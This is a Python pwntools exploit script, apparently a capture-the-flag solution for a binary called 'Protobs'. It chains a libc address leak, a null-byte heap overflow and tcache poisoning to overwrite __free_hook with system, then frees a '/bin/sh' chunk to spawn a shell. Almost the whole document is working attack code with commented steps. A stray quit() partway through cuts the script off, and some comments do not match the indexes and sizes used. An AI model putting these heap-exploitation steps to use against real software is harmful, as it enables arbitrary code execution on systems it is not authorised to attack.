#!/usr/bin/env pythonfrom pwn import *context.log_level = 'DEBUG'deb

1. #!/usr/bin/env python
2.  
3. from pwn import *
4. context.log_level = 'DEBUG'
5.  
6.  
7. debug=True
8. p = process('./Protobs')
9. #libc = ELF('./libc.so.6')
10. libc = ELF('./libc.so.6')
11. #gdb.attach(p,'heap-analysis')
12.  
13.  
14. def create_without_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description):
15. p.sendlineafter('~$ ', str(2))
16. p.sendlineafter(' [ Game ]: ',str(game))
17. p.sendlineafter('[ Contrast ]: ', str(contrast))
18. p.sendlineafter('[ Gamma ]: ', str(gamma))
19. p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))
20. p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))
21. p.sendlineafter('[ Controller ]: ', str(controller))
22. p.sendlineafter('[ Size of Description ]: ', str(size_description))
23.  
24. def create_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description,description):
25. p.sendlineafter('~$ ', str(2))
26. p.sendlineafter(' [ Game ]: ',str(game))
27. p.sendlineafter('[ Contrast ]: ', str(contrast))
28. p.sendlineafter('[ Gamma ]: ', str(gamma))
29. p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))
30. p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))
31. p.sendlineafter('[ Controller ]: ', str(controller))
32. p.sendlineafter('[ Size of Description ]: ', str(size_description))
33. p.sendlineafter('[ Description ]: ',str(description))
34.  
35.  
36. def list_():
37. p.sendlineafter('protobs@player2:~$ ', str(1))
38. ret = p.recvuntil('protobs')
39. log.info("list of configuration : " + ret)
40.  
41. def read(idx,description):
42. p.sendlineafter('protobs@player2:~$ ', str(3))
43. p.sendlineafter('[ Config Index ]: ',str(idx))
44. ret = p.recvuntil('protobs')
45. return ret[:-1]
46.  
47.  
48. def delete(idx):
49. p.sendlineafter('~$ ', str(4))
50. p.sendlineafter('[ Config Index ]: ', str(idx))
51.  
52.  
53.  
54.  
55. description= "A" * 0x60
56. size=0x450
57. create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
58. description= "B" * 511
59. create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
60. description= "C" * 511
61. create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
62.  
63. delete(1) ## To Not free the head or tail of the heap but the MIDDLE
64.  
65. create_without_desc("hello",0,0,0,0,0,0)
66. list_()
67. p.sendlineafter('@player2:~$ ', str(3))
68. p.sendlineafter('[ Config Index ]: ',str(1))
69. p.recvuntil('[ Description ]: ')
70.  
71.  
72.  
73.  
74.  
75.  
76. #gef p system
77. #Cannot access memory at address 0x7fb53ec9ffd0
78. #gef print __libc_start_main
79. #Cannot access memory at address 0x7fb53ec73a80
80. #gef p 0x7fb53ec9ffd0 - 0x7fb53ec73a80
81. libc_offset=0x001e4ca0
82. system_offset=0x0052fd0
83.  
84. free_hook = libc.symbols['__free_hook']
85.  
86.  
87. libc_leak = u64(p.recv(6).ljust(8, '\x00'))
88. libc_base = libc_leak - libc_offset
89. system=libc_base + system_offset
90.  
91.  
92. log.info("Leak: 0x{:x}".format(libc_leak))
93. log.info("Libc: 0x{:x}".format(libc_base))
94. log.info("system: 0x{:x}".format(system))
95. log.info('__free_hook: ' + hex(free_hook))
96.  
97.  
98.  
99. list_()
100.  
101. ### SECOND PART
102. # Add a 0x50 and 0x180 chunk
103. description = "A" * 0x180
104. size = 0x180
105. create_desc("hello",0,0,0,0,0,size,description)
106. description = "A" * 0x180
107. size = 0x180
108. create_desc("hello",0,0,0,0,0,size,description)
109. delete(3)
110. description = "A" * 0x100
111. size = 0x100
112. create_desc("hello",0,0,0,0,0,size,description)
113. delete(3) # delte config
114.  
115.  
116.  
117.  
118.  
119. # Add a 0x50 and 0x180 chunk
120. description = "A" * 0x58
121. size = 0x58
122. create_desc("hello",0,0,0,0,0,size,description)
123.  
124.  
125. description = "B"*0x180
126. size = 0x180
127. create_desc("hello",0,0,0,0,0,size,description)
128.  
129.  
130.  
131. quit()
132.  
133.  
134. # Free them both
135. delete(3) #0 # Goes into 0x50 tcache bin
136. delete(4) #1 # Goes into 0x180 tcache bin
137.  
138. # Get back the 0x50 chunk, but also null byte overflow into the 0x180 chunk
139. # Also put in /bin/sh\x00 into it for later use
140. size=0x58
141. description='/bin/sh\x00' + 'A'*0x50
142. create_desc("hello",0,0,0,0,0,size,description) # chunk A
143.  
144. # The 0x180 chunk's size is now actually 0x100 (due to null byte overflow)
145. # This means we can free it again immediately
146. delete(5) #1 # Goes into 0xf0 tcache bin
147.  
148.  
149. # Get back the 0x100 chunk out of the 0x180 tcache bin
150. size=0x180
151. description='C'*0x180
152. create_desc("hello",0,0,0,0,0,size,description) # chunk B
153.  
154.  
155. # Since tcache_get will null out the key, we can free it immediately
156. delete(7) #3 # Goes into 0xf0 tcache bin
157.  
158. # Now: tcache[0x100] -> Chunk B <- Chunk B
159.  
160.  
161. # We do the usual tcache poisoning attack
162.  
163. # Get Chunk B from 0xf0 tcache bin and change it's FD to __free_hook
164. size=0xf0
165. description=p64(free_hook) + 'D'*0xe8
166. create_desc("hello",0,0,0,0,0,size,description)
167.  
168. size=0xf0
169. description='E'*0xf0
170. # Allocates chunk B again
171. create_desc("hello",0,0,0,0,0,size,description)
172.  
173. size=0xf0
174. description=p64(system) + 'F'*0xe8
175. # Allocates chunk on __free_hook, change it to system
176. create_desc("hello",0,0,0,0,0,size,description)
177.  
178. # Call free on the chunk with /bin/sh\x00 in it
179. # This will then call free('/bin/sh\x00') which calls system('/bin/sh\x00')
180. delete(4) #0
181.  
182. p.interactive()